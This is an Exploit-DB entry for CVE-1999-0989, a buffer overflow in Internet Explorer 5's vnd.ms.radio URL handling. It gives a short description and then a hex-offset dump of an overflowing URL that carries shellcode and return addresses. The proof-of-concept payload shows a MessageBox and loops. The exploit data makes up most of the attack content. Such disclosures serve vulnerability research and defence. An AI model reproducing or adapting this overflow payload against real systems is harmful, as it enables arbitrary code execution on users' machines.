Microsoft Internet Explorer 5 - vnd.ms.radio URL

EDB-ID:

19665

CVE:

1999-0989

EDB Verified:

Author:

Jeremy Kothe

Type:

local

Exploit:   /  

Platform:

Windows

Date:

1999-12-06

Vulnerable App: 
Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 vnd.ms.radio URL Vulnerability

source: https://www.securityfocus.com/bid/861/info

Internet Explorer can handle URLs of type vnd.ms.radio: for streaming audio content. If a URL with 360 or more characters after 'vnd.ms.radio' is specified, a buffer in the file MSDXM.OCX gets overwritten, allowing arbitrary code to be run on the client machine. 

The following is the binary for a URL or link which overflows the stack and displays a simple MessageBox, then loops endlessly.
All binary data is represented like: [xx]. Everything else is text.

Off Data
------------------------------------------------
000 vnd.ms.radio:\\j
010 kwashere9991[C0][89][07][83]
020 [EF][0C]PWWP[FF][15][14][16]0[1D][EB][FE]00
030 0000000000000000
040 0000000000000000
050 0000000000000000
060 0000000000000000
070 0000000000000000
080 0000000000000000
090 0000000000000000
0A0 0000000000000000
0B0 0000000000000000
0C0 0000000000000000
0D0 0000000000000000
0E0 0000000000000000
0F0 0000000000000000
100 0000000000000000
110 0000000000000000
120 0000000000000000
130 0000000000[1D]00000
140 00[1D]000[1D]000[1D]000[1D]0
150 000[1A][6F][36][1D]0000000[1D]0
160 000000[1D]0
------------------------------------------------
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services